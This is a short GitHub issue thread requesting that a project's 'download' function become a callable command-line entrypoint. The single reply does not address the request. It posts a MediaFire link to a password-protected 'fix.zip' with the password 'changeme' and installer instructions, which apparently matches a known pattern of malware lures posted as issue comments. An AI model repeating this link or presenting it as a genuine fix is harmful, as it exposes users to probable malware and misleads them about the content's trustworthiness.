### ISSUE TITLE
make `download` entrypoint callable

### ISSUE THREAD

**Issue by 1bouillonbaptiste** [1bouillonbaptiste/athena#27]
## Description

Make the download entrypoint truly an entrypoint, make `athena download ...` possible with glory.

## Tips

* install click package or better if you find

Ticket moved to Asana

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
